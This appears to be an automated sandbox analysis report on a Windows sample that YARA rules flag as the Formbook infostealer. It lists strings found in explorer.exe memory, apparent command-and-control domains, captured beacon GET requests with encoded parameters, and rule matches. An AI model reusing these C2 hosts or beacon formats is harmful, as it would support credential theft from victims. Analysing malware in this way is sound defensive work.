          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gchzwf.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.millerstoehr.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.millerstoehr.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.millerstoehr.com/bp31/www.bolfm.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.millerstoehr.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.odisexport.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.odisexport.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.odisexport.com/bp31/www.spitzpr-gq.info
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.odisexport.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piabellacasino347.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piabellacasino347.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piabellacasino347.com/bp31/www.darkpinefarm.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piabellacasino347.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spitzpr-gq.info
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spitzpr-gq.info/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spitzpr-gq.info/bp31/www.piabellacasino347.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spitzpr-gq.infoReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.com/bp31/www.odisexport.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyz
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyz/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyz/bp31/www.biddrivego.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyzReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.com/bp31/www.turdfi.xyz
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.comReferer:
          Source: explorer.exe, 00000004.00000000.2081190838.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4544685051.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000003.3095509048.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2076988061.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000000.2076988061.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4537110885.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000000.2076134694.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4532933943.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094472883.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000004.00000003.3842161318.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4541836056.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.4541926212.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000004.00000002.4544685051.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2081190838.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: unknown DNS traffic detected: queries for: www.fnb.gay
          Source: C:\Windows\explorer.exe Code function: 4_2_0E74DF82 getaddrinfo,setsockopt,recv, 4_2_0E74DF82
          Source: global traffic HTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOv HTTP/1.1 Host: www.millerstoehr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk HTTP/1.1 Host: www.biddrivego.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcp HTTP/1.1 Host: www.cascadefinnish.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4 HTTP/1.1 Host: www.alnawrasalrahhal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp HTTP/1.1 Host: www.tqmsn.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          Source: Yara match File source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.UgHXEfw1uL.exe.7500000.7.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
          Source: 0.2.UgHXEfw1uL.exe.2bd1438.5.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
          Source: UgHXEfw1uL.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
